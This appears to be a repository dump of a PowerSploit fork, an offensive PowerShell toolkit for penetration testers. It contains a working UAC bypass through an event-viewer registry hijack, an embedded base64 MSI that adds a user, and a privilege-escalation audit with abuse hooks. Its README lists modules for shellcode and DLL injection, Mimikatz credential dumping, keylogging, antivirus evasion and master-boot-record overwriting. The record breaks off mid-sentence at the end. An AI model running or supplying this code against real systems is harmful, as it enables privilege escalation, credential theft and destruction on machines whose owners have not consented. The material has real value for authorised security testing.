xFTlQgQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5GSVhFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlOT05FX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUJBU0lDX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJRlVMTF9VTklOU1RBTExfQVJHVU1FTlRTYnouU2V0dXBTaXplMjMyOTYwTWFudWZhY3R1cmVyUHJvZHVjdENvZGV7MjcxQkJDRUQtRjM2QS00RThFLUE1NzYtOTQ1NUYwQ0EwMUE4fVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZU1TSSBXcmFwcGVyIFRlbXBsYXRlUHJvZHVjdFZlcnNpb24xLjAuMC4we0NDMDM1QzE4LTBGQzctNDcwOC04ODA2LUQ0QjA5MUU1OUFBN31TZWN1cmVDdXN0b21Qcm9wZXJ0aWVzV0lYX0RPV05HUkFERV9ERVRFQ1RFRDtXSVhfVVBHUkFERV9ERVRFQ1RFRFNPRlRXQVJFXFtCWi5DT01QQU5ZTkFNRV1cTVNJIFdyYXBwZXJcSW5zdGFsbGVkXFtCWi5XUkFQUEVEX0FQUElEXUxvZ29uVXNlcltMb2dv'\n\n    try {\n        [System.Convert]::FromBase64String( $Binary ) | Set-Content -Path $Path -Encoding Byte\n        Write-Verbose \"MSI written out to '$Path'\"\n\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'OutputPath' $Path\n        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UserAddMSI')\n        $Out\n    }\n    catch {\n        Write-Warning \"Error while writing to location '$Path': $_\"\n    }\n}\n\n\nfunction Invoke-EventVwrBypass {\n<#\n.SYNOPSIS\n\nBypasses UAC by performing an image hijack on the .msc file extension\nOnly tested on Windows 7 and Windows 10\n\nAuthor: Matt Nelson (@enigma0x3)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None\n\n.PARAMETER Command\n\n Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command \"powershell -enc <encodedCommand>\"\n\n.EXAMPLE\n\nInvoke-EventVwrBypass -Command \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=\"\n\nThis will write out \"Is Elevated: True\" to C:\\UACBypassTest.\n#>\n\n    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]\n    Param (\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Command,\n\n        [Switch]\n        $Force\n    )\n    $ConsentPrompt = (Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).ConsentPromptBehaviorAdmin\n    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).PromptOnSecureDesktop\n\n    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){\n        \"UAC is set to 'Always Notify'. This module does not bypass this setting.\"\n        exit\n    }\n    else{\n        #Begin Execution\n        $mscCommandPath = \"HKCU:\\Software\\Classes\\mscfile\\shell\\open\\command\"\n        $Command = $pshome + '\\' + $Command\n        #Add in the new registry entries to hijack the msc file\n        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){\n            New-Item $mscCommandPath -Force |\n                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null\n        }else{\n            Write-Warning \"Key already exists, consider using -Force\"\n            exit\n        }\n\n        if (Test-Path $mscCommandPath) {\n            Write-Verbose \"Created registry entries to hijack the msc extension\"\n        }else{\n            Write-Warning \"Failed to create registry key, exiting\"\n            exit\n        }\n\n        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'\n        #Start Event Viewer\n        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {\n            $Process = Start-Process -FilePath $EventvwrPath -PassThru\n            Write-Verbose \"Started eventvwr.exe\"\n        }\n\n        #Sleep 5 seconds \n        Write-Verbose \"Sleeping 5 seconds to trigger payload\"\n        if (-not $PSBoundParameters['WhatIf']) {\n            Start-Sleep -Seconds 5\n        }\n\n        $mscfilePath = \"HKCU:\\Software\\Classes\\mscfile\"\n\n        if (Test-Path $mscfilePath) {\n            #Remove the registry entry\n            Remove-Item $mscfilePath -Recurse -Force\n            Write-Verbose \"Removed registry entries\"\n        }\n\n        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){\n            Stop-Process -Id $Process.Id\n            Write-Verbose \"Killed running eventvwr process\"\n        }\n    }\n}\n\n\nfunction Invoke-PrivescAudit {\n<#\n.SYNOPSIS\n\nExecutes all functions that check for various Windows privilege escalation opportunities.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nExecutes all functions that check for various Windows privilege escalation opportunities.\n\n.PARAMETER Format\n\nString. Format to decide on what is returned from the command, an Object Array, List, or HTML Report.\n\n.PARAMETER HTMLReport\n\nDEPRECATED - Switch. Write a HTML version of the report to SYSTEM.username.html. \nSuperseded by the Format parameter.\n\n.EXAMPLE\n\nInvoke-PrivescAudit\n\nRuns all escalation checks and outputs a status report for discovered issues.\n\n.EXAMPLE\n\nInvoke-PrivescAudit -Format HTML\n\nRuns all escalation checks and outputs a status report to SYSTEM.username.html\ndetailing any discovered issues.\n\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [ValidateSet('Object','List','HTML')]\n        [String]\n        $Format = 'Object',\n        [Switch]\n        $HTMLReport\n    )\n\n    if($HTMLReport){ $Format = 'HTML' }\n\n    if ($Format -eq 'HTML') {\n        $HtmlReportFile = \"$($Env:ComputerName).$($Env:UserName).html\"\n        $Header = \"<style>\"\n        $Header = $Header + \"BODY{background-color:peachpuff;}\"\n        $Header = $Header + \"TABLE{border-width: 1px;border-style: solid;border-color: black;border-collapse: collapse;}\"\n        $Header = $Header + \"TH{border-width: 1px;padding: 0px;border-style: solid;border-color: black;background-color:thistle}\"\n        $Header = $Header + \"TD{border-width: 3px;padding: 0px;border-style: solid;border-color: black;background-color:palegoldenrod}\"\n        $Header = $Header + \"</style>\"\n        ConvertTo-HTML -Head $Header -Body \"<H1>PowerUp report for '$($Env:ComputerName).$($Env:UserName)'</H1>\" | Out-File $HtmlReportFile\n    }\n\n    Write-Verbose \"Running Invoke-PrivescAudit\"\n\n    $Checks = @(\n        # Initial admin checks\n        @{\n            Type    = 'User Has Local Admin Privileges'\n            Command = { if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")){ New-Object PSObject } }\n        },\n        @{\n            Type        = 'User In Local Group with Admin Privileges'\n            Command     = { if ((Get-ProcessTokenGroup | Select-Object -ExpandProperty SID) -contains 'S-1-5-32-544'){ New-Object PSObject } }\n            AbuseScript = { 'Invoke-WScriptUACBypass -Command \"...\"' }\n        },\n        @{\n            Type       = 'Process Token Privileges'\n            Command    = { Get-ProcessTokenPrivilege -Special | Where-Object {$_} }\n        },\n        # Service checks\n        @{\n            Type    = 'Unquoted Service Paths'\n            Command = { Get-UnquotedService }\n        },\n        @{\n            Type    = 'Modifiable Service Files'\n            Command = { Get-ModifiableServiceFile }\n        },\n        @{\n            Type    = 'Modifiable Services'\n            Command = { Get-ModifiableService }\n        },\n        # DLL hijacking\n        @{\n            Type        = '%PATH% .dll Hijacks'\n            Command     = { Find-PathDLLHijack }\n            AbuseScript = { \"Write-HijackDll -DllPath '$($_.ModifiablePath)\\wlbsctrl.dll'\" }\n        },\n        # Registry checks\n        @{\n            Type        = 'AlwaysInstallElevated Registry Key'\n            Command     = { if (Get-RegistryAlwaysInstallElevated){ New-Object PSObject } }\n            AbuseScript = { 'Write-UserAddMSI' }\n        },\n        @{\n            Type    = 'Registry Autologons'\n            Command = { Get-RegistryAutoLogon }\n        },\n        @{\n            Type    = 'Modifiable Registry Autorun'\n            Command = { Get-ModifiableRegistryAutoRun }\n        },\n        # Other checks\n        @{\n            Type    = 'Modifiable Scheduled Task Files'\n            Command = { Get-ModifiableScheduledTaskFile }\n        },\n        @{\n            Type    = 'Unattended Install Files'\n            Command = { Get-UnattendedInstallFile }\n        },\n        @{\n            Type    = 'Encrypted web.config Strings'\n            Command = { Get-WebConfig | Where-Object {$_} }\n        },\n        @{\n            Type    = 'Encrypted Application Pool Passwords'\n            Command = { Get-ApplicationHost | Where-Object {$_} }\n        },\n        @{\n            Type    = 'McAfee SiteList.xml files'\n            Command = { Get-SiteListPassword | Where-Object {$_} }\n        },\n        @{\n            Type    = 'Cached GPP Files'\n            Command = { Get-CachedGPPPassword | Where-Object {$_} }\n        }\n    )\n\n    ForEach($Check in $Checks){\n        Write-Verbose \"Checking for $($Check.Type)...\"\n        $Results = . $Check.Command\n        $Results | Where-Object {$_} | ForEach-Object {\n            $_ | Add-Member Noteproperty 'Check' $Check.Type\n            if ($Check.AbuseScript){\n                $_ | Add-Member Noteproperty 'AbuseFunction' (. $Check.AbuseScript)\n            }\n        }\n        switch($Format){\n            Object { $Results }\n            List   { \"`n`n[*] Checking for $($Check.Type)...\"; $Results | Format-List }\n            HTML   { $Results | ConvertTo-HTML -Head $Header -Body \"<H2>$($Check.Type)</H2>\" | Out-File -Append $HtmlReportFile }\n        }\n    }\n\n    if ($Format -eq 'HTML') {\n        Write-Verbose \"[*] Report written to '$HtmlReportFile' `n\"\n    }\n}\n\n\n# PSReflect signature specifications\n$Module = New-InMemoryModule -ModuleName PowerUpModule\n# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', '', Scope='Function')]\n\n$FunctionDefinitions = @(\n    (func kernel32 GetCurrentProcess ([IntPtr]) @()),\n    (func kernel32 OpenProcess ([IntPtr]) @([UInt32], [Bool], [UInt32]) -SetLastError),\n    (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError),\n    (func advapi32 OpenProcessToken ([Bool]) @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError)\n    (func advapi32 GetTokenInformation ([Bool]) @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType()) -SetLastError),\n    (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),\n    (func advapi32 LookupPrivilegeName ([Int]) @([IntPtr], [IntPtr], [String].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),\n    (func advapi32 QueryServiceObjectSecurity ([Bool]) @([IntPtr], [Security.AccessControl.SecurityInfos], [Byte[]], [UInt32], [UInt32].MakeByRefType()) -SetLastError),\n    (func advapi32 ChangeServiceConfig ([Bool]) @([IntPtr], [UInt32], [UInt32], [UInt32], [String], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) -SetLastError -Charset Unicode),\n    (func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError),\n    (func ntdll RtlAdjustPrivilege ([UInt32]) @([Int32], [Bool], [Bool], [Int32].MakeByRefType()))\n)\n\n# https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/\n$ServiceAccessRights = psenum $Module PowerUp.ServiceAccessRights UInt32 @{\n    QueryConfig             =   '0x00000001'\n    ChangeConfig            =   '0x00000002'\n    QueryStatus             =   '0x00000004'\n    EnumerateDependents     =   '0x00000008'\n    Start                   =   '0x00000010'\n    Stop                    =   '0x00000020'\n    PauseContinue           =   '0x00000040'\n    Interrogate             =   '0x00000080'\n    UserDefinedControl      =   '0x00000100'\n    Delete                  =   '0x00010000'\n    ReadControl             =   '0x00020000'\n    WriteDac                =   '0x00040000'\n    WriteOwner              =   '0x00080000'\n    Synchronize             =   '0x00100000'\n    AccessSystemSecurity    =   '0x01000000'\n    GenericAll              =   '0x10000000'\n    GenericExecute          =   '0x20000000'\n    GenericWrite            =   '0x40000000'\n    GenericRead             =   '0x80000000'\n    AllAccess               =   '0x000F01FF'\n} -Bitfield\n\n$SidAttributes = psenum $Module PowerUp.SidAttributes UInt32 @{\n    SE_GROUP_MANDATORY              =   '0x00000001'\n    SE_GROUP_ENABLED_BY_DEFAULT     =   '0x00000002'\n    SE_GROUP_ENABLED                =   '0x00000004'\n    SE_GROUP_OWNER                  =   '0x00000008'\n    SE_GROUP_USE_FOR_DENY_ONLY      =   '0x00000010'\n    SE_GROUP_INTEGRITY              =   '0x00000020'\n    SE_GROUP_RESOURCE               =   '0x20000000'\n    SE_GROUP_INTEGRITY_ENABLED      =   '0xC0000000'\n} -Bitfield\n\n$LuidAttributes = psenum $Module PowerUp.LuidAttributes UInt32 @{\n    DISABLED                            =   '0x00000000'\n    SE_PRIVILEGE_ENABLED_BY_DEFAULT     =   '0x00000001'\n    SE_PRIVILEGE_ENABLED                =   '0x00000002'\n    SE_PRIVILEGE_REMOVED                =   '0x00000004'\n    SE_PRIVILEGE_USED_FOR_ACCESS        =   '0x80000000'\n} -Bitfield\n\n$SecurityEntity = psenum $Module PowerUp.SecurityEntity UInt32 @{\n    SeCreateTokenPrivilege              =   1\n    SeAssignPrimaryTokenPrivilege       =   2\n    SeLockMemoryPrivilege               =   3\n    SeIncreaseQuotaPrivilege            =   4\n    SeUnsolicitedInputPrivilege         =   5\n    SeMachineAccountPrivilege           =   6\n    SeTcbPrivilege                      =   7\n    SeSecurityPrivilege                 =   8\n    SeTakeOwnershipPrivilege            =   9\n    SeLoadDriverPrivilege               =   10\n    SeSystemProfilePrivilege            =   11\n    SeSystemtimePrivilege               =   12\n    SeProfileSingleProcessPrivilege     =   13\n    SeIncreaseBasePriorityPrivilege     =   14\n    SeCreatePagefilePrivilege           =   15\n    SeCreatePermanentPrivilege          =   16\n    SeBackupPrivilege                   =   17\n    SeRestorePrivilege                  =   18\n    SeShutdownPrivilege                 =   19\n    SeDebugPrivilege                    =   20\n    SeAuditPrivilege                    =   21\n    SeSystemEnvironmentPrivilege        =   22\n    SeChangeNotifyPrivilege             =   23\n    SeRemoteShutdownPrivilege           =   24\n    SeUndockPrivilege                   =   25\n    SeSyncAgentPrivilege                =   26\n    SeEnableDelegationPrivilege         =   27\n    SeManageVolumePrivilege             =   28\n    SeImpersonatePrivilege              =   29\n    SeCreateGlobalPrivilege             =   30\n    SeTrustedCredManAccessPrivilege     =   31\n    SeRelabelPrivilege                  =   32\n    SeIncreaseWorkingSetPrivilege       =   33\n    SeTimeZonePrivilege                 =   34\n    SeCreateSymbolicLinkPrivilege       =   35\n}\n\n$SID_AND_ATTRIBUTES = struct $Module PowerUp.SidAndAttributes @{\n    Sid         =   field 0 IntPtr\n    Attributes  =   field 1 UInt32\n}\n\n$TOKEN_TYPE_ENUM = psenum $Module PowerUp.TokenTypeEnum UInt32 @{\n    Primary         = 1\n    Impersonation   = 2\n}\n\n$TOKEN_TYPE = struct $Module PowerUp.TokenType @{\n    Type  = field 0 $TOKEN_TYPE_ENUM\n}\n\n$SECURITY_IMPERSONATION_LEVEL_ENUM = psenum $Module PowerUp.ImpersonationLevelEnum UInt32 @{\n    Anonymous         =   0\n    Identification    =   1\n    Impersonation     =   2\n    Delegation        =   3\n}\n\n$IMPERSONATION_LEVEL = struct $Module PowerUp.ImpersonationLevel @{\n    ImpersonationLevel  = field 0 $SECURITY_IMPERSONATION_LEVEL_ENUM\n}\n\n$TOKEN_GROUPS = struct $Module PowerUp.TokenGroups @{\n    GroupCount  = field 0 UInt32\n    Groups      = field 1 $SID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 32)\n}\n\n$LUID = struct $Module PowerUp.Luid @{\n    LowPart         =   field 0 $SecurityEntity\n    HighPart        =   field 1 Int32\n}\n\n$LUID_AND_ATTRIBUTES = struct $Module PowerUp.LuidAndAttributes @{\n    Luid         =   field 0 $LUID\n    Attributes   =   field 1 UInt32\n}\n\n$TOKEN_PRIVILEGES = struct $Module PowerUp.TokenPrivileges @{\n    PrivilegeCount  = field 0 UInt32\n    Privileges      = field 1 $LUID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 50)\n}\n\n$Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'PowerUp.NativeMethods'\n$Advapi32 = $Types['advapi32']\n$Kernel32 = $Types['kernel32']\n$NTDll    = $Types['ntdll']\n\nSet-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup\nSet-Alias Invoke-AllChecks Invoke-PrivescAudit\n"
  },
  {
    "path": "Privesc/Privesc.psd1",
    "content": "@{\n\n# Script module or binary module file associated with this manifest.\nModuleToProcess = 'Privesc.psm1'\n\n# Version number of this module.\nModuleVersion = '3.0.0.0'\n\n# ID used to uniquely identify this module\nGUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'\n\n# Author of this module\nAuthor = 'Will Schroeder (@harmj0y)'\n\n# Copyright statement for this module\nCopyright = 'BSD 3-Clause'\n\n# Description of the functionality provided by this module\nDescription = 'PowerSploit Privesc Module'\n\n# Minimum version of the Windows PowerShell engine required by this module\nPowerShellVersion = '2.0'\n\n# Functions to export from this module\nFunctionsToExport = @(\n    'Get-ModifiablePath',\n    'Get-ProcessTokenGroup',\n    'Get-ProcessTokenPrivilege',\n    'Enable-Privilege',\n    'Add-ServiceDacl',\n    'Set-ServiceBinaryPath',\n    'Test-ServiceDaclPermission',\n    'Get-UnquotedService',\n    'Get-ModifiableServiceFile',\n    'Get-ModifiableService',\n    'Get-ServiceDetail',\n    'Invoke-ServiceAbuse',\n    'Write-ServiceBinary',\n    'Install-ServiceBinary',\n    'Restore-ServiceBinary',\n    'Find-ProcessDLLHijack',\n    'Find-PathDLLHijack',\n    'Write-HijackDll',\n    'Get-RegistryAlwaysInstallElevated',\n    'Get-RegistryAutoLogon',\n    'Get-ModifiableRegistryAutoRun',\n    'Get-ModifiableScheduledTaskFile',\n    'Get-UnattendedInstallFile',\n    'Get-WebConfig',\n    'Get-ApplicationHost',\n    'Get-SiteListPassword',\n    'Get-CachedGPPPassword',\n    'Write-UserAddMSI',\n    'Invoke-EventVwrBypass',\n    'Invoke-PrivescAudit',\n    'Get-System'\n)\n\n# List of all files packaged with this module\nFileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'\n\n}\n"
  },
  {
    "path": "Privesc/Privesc.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "Privesc/README.md",
    "content": "To install this module, drop the entire Privesc folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\n\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\n\nTo use the module, type `Import-Module Privesc`\n\nTo see the commands imported, type `Get-Command -Module Privesc`\n\nFor help on each individual command, Get-Help is your friend.\n\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.\n\n\n## PowerUp\n\nPowerUp aims to be a clearinghouse of common Windows privilege escalation\nvectors that rely on misconfigurations.\n\nRunning Invoke-AllChecks will output any identifiable vulnerabilities along\nwith specifications for any abuse functions. The -HTMLReport flag will also\ngenerate a COMPUTER.username.html version of the report.\n\nAuthor: @harmj0y\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n\n### Token/Privilege Enumeration/Abuse:\n    Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not\n    Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID\n    Enable-Privilege                    -   enables a specific privilege for the current process\n\n### Service Enumeration/Abuse:\n    Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set\n    Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name\n    Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config\n    Get-ModifiableService               -   returns services the current user can modify\n    Get-ServiceDetail                   -   returns detailed information about a specified service\n    Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value\n    Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command\n    Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command\n    Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command\n    Restore-ServiceBinary               -   restores a replaced service binary with the original executable\n\n### DLL Hijacking:\n    Find-ProcessDLLHijack               -   finds potential DLL hijacking opportunities for currently running processes\n    Find-PathDLLHijack                  -   finds service %PATH% DLL hijacking opportunities\n    Write-HijackDll                     -   writes out a hijackable DLL\n    \n### Registry Checks:\n    Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set\n    Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry\n    Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns\n\n### Miscellaneous Checks:\n    Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files\n    Get-UnattendedInstallFile           -   finds remaining unattended installation files\n    Get-Webconfig                       -   checks for any encrypted web.config strings\n    Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords\n    Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files\n    Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files\n\n### Other Helpers/Meta-Functions:\n    Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify\n    Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added\n    Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe\n    Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)\n"
  },
  {
    "path": "README.md",
    "content": "Forked to add a few features to PowerView.ps1 that I commonly perform manually\n\n## This project is no longer supported\n\n### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:\n\n## CodeExecution\n\n**Execute code on a target machine.**\n\n#### `Invoke-DllInjection`\n\nInjects a Dll into the process ID of your choosing.\n\n#### `Invoke-ReflectivePEInjection`\n\nReflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.\n\n#### `Invoke-Shellcode`\n\nInjects shellcode into the process ID of your choosing or within PowerShell locally.\n\n#### `Invoke-WmiCommand`\n\nExecutes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.\n\n## ScriptModification\n\n**Modify and/or prepare scripts for execution on a compromised machine.**\n\n#### `Out-EncodedCommand`\n\nCompresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.\n\n#### `Out-CompressedDll`\n\nCompresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.\n\n#### `Out-EncryptedScript`\n\nEncrypts text files/scripts.\n\n#### `Remove-Comment`\n\nStrips comments and extra whitespace from a script. \n\n## Persistence\n\n**Add persistence capabilities to a PowerShell script**\n\n#### `New-UserPersistenceOption`\n\nConfigure user-level persistence options for the Add-Persistence function.\n\n#### `New-ElevatedPersistenceOption`\n\nConfigure elevated persistence options for the Add-Persistence function.\n\n#### `Add-Persistence`\n\nAdd persistence capabilities to a script.\n\n#### `Install-SSP`\n\nInstalls a security support provider (SSP) dll.\n\n#### `Get-SecurityPackages`\n\nEnumerates all loaded security packages (SSPs).\n\n## AntivirusBypass\n\n**AV doesn't stand a chance against PowerShell!**\n\n#### `Find-AVSignature`\n\nLocates single Byte AV signatures utilizing the same method as DSplit from \"class101\".\n\n## Exfiltration\n\n**All your data belong to me!**\n\n#### `Invoke-TokenManipulation`\n\nLists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.\n\n#### `Invoke-CredentialInjection`\n\nCreate logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).\n\n#### `Invoke-NinjaCopy`\n\nCopies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.\n\n#### `Invoke-Mimikatz`\n\nReflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.\n\n#### `Get-Keystrokes`\n\nLogs keys pressed, time and the active window.\n\n#### `Get-GPPPassword`\n\nRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.\n\n#### `Get-GPPAutologon`\n\nRetrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.\n\n#### `Get-TimedScreenshot`\n\nA function that takes screenshots at a regular interval and saves them to a folder.\n\n#### `New-VolumeShadowCopy`\n\nCreates a new volume shadow copy.\n\n#### `Get-VolumeShadowCopy`\n\nLists the device paths of all local volume shadow copies.\n\n#### `Mount-VolumeShadowCopy`\n\nMounts a volume shadow copy.\n\n#### `Remove-VolumeShadowCopy`\n\nDeletes a volume shadow copy.\n\n#### `Get-VaultCredential`\n\nDisplays Windows vault credential objects including cleartext web credentials.\n\n#### `Out-Minidump`\n\nGenerates a full-memory minidump of a process.\n\n#### `Get-MicrophoneAudio`\n\nRecords audio from system microphone and saves to disk\n\n## Mayhem\n\n**Cause general mayhem with PowerShell.**\n\n#### `Set-MasterBootRecord`\n\nProof of concept code that overwrites the master boot record with the\n message of your choice.\n\n#### `Set-CriticalProcess`\n\nCauses your machine to blue screen upon exiting PowerShell.\n\n## Privesc\n\n**Tools to help with escalating privileges on a target.**\n\n#### `PowerUp`\n\nClearing house of common privilege escalation checks, along with some weaponization vectors.\n\n## Recon\n\n**Tools to aid in the reconnaissance phase of a penetration test.**\n\n#### `Invoke-Portscan`\n\nDoes a simple port scan using regular sockets, based (pretty) loosely on nmap.\n\n#### `Get-HttpStatus`\n\nReturns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.\n\n#### `Invoke-ReverseDnsLookup`\n\nScans an IP address range for DNS PTR records.\n\n#### `PowerView`\n\nPowerView is series of functions that performs network and Windows domain enumeration and exploitation.\n\n## Recon\\Dictionaries\n\n**A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.**\n\n* admin.txt - <http://cirt.net/nikto2/>\n* generic.txt - <http://sourceforge.net/projects/yokoso/files/yokoso-0.1/>\n* sharepoint.txt - <http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/>\n\n## License\n\nThe PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise.\n\n## Usage\n\nRefer to the comment-based help in each individual script for detailed usage information.\n\nTo install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\n\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\n\nTo use the module, type `Import-Module PowerSploit`\n\nTo see the commands imported, type `Get-Command -Module PowerSploit`\n\nIf you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:\n`$Env:PSModulePath.Split(';') |\n % { if ( Test-Path (Join-Path $_ PowerSploit) )\n {Get-ChildItem $_ -Recurse | Unblock-File} }`\n\nFor help on each individual command, Get-Help is your friend.\n\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.\n\n## Contribution Rules\n\nWe need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following:\n\n* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason.\n* The module manifest needs to be updated to reflect the new function being added.\n* A brief description of the function should be added to this README.md\n* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks!\n\n## Script Style Guide\n\n**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.**\n\n* Avoid Write-Host **at all 